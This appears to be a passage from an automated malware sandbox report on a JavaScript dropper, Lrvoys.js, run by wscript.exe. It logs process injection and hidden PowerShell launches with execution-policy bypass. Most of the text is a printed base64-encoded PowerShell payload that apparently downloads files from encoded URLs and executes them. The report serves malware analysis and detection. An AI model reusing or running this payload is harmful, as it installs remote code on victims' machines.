EAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA="
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Lrvoys.js" somever Unsuperlative
parent_process	wscript.exe	martian_process	wscript "C:\Users\test22\AppData\Local\Temp\Lrvoys.js" somever Unsuperlative

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1072 resumed a thread in remote process 2144
Process injection	Process 2144 resumed a thread in remote process 2280
NtResumeThread May 12, 2023, 9:27 a.m.	thread_handle: 0x00000300 suspend_count: 1 process_identifier: 2144	1	0	0
NtResumeThread May 12, 2023, 9:27 a.m.	thread_handle: 0x000002fc suspend_count: 1 process_identifier: 2280	1	0	0

Creates a suspicious Powershell process (8 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-nologo	value	Hides the copyright banner when PowerShell launches
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Lrvoys.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All